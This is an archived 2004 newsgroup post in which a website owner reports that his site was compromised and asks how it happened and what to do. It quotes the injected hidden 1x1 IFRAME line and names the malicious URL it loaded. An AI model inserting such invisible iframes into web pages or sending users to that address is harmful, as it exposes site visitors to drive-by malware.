security compromised
From: Ivo (no_at_thank.you)
Date: 06/04/04
- Next message: Yeray Garcia-Quintana: "Re: Catch warnings"
- Previous message: Subhash: "Re: Newbie question about PHP"
- Next in thread: Filth: "Re: security compromised"
- Reply: Filth: "Re: security compromised"
- Reply: David Mackenzie: "Re: security compromised"
- Reply: PhilM: "Re: security compromised"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Date: Fri, 4 Jun 2004 15:29:08 +0200
Hi newsgroup,
it appears someone has broken into my site. This morning I found about 20
files (each called index.htm) suddenly featured this line:
<IFRAME SRC="url-of-bad-site" WIDTH=1 HEIGHT=1></IFRAME>
and their last modified date was set to today between midnight and 1 GMT. In
some files, this line was placed directly after the body opening tag, in
others it was just before </body>. In one file where the whole document is
written in javascript, they had even escaped their quotes!
The malicious url is www.b00gle.com/fa/?d=get
I have no access to the raw server logs and my own log script shows no
strange hits around that time.
How have they done this? And what can I do about it? I ask here because the
site uses PHP a lot but I guess there are more appropriate places to ask.
Thanks
Ivo
- Next message: Yeray Garcia-Quintana: "Re: Catch warnings"
- Previous message: Subhash: "Re: Newbie question about PHP"
- Next in thread: Filth: "Re: security compromised"
- Reply: Filth: "Re: security compromised"
- Reply: David Mackenzie: "Re: security compromised"
- Reply: PhilM: "Re: security compromised"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
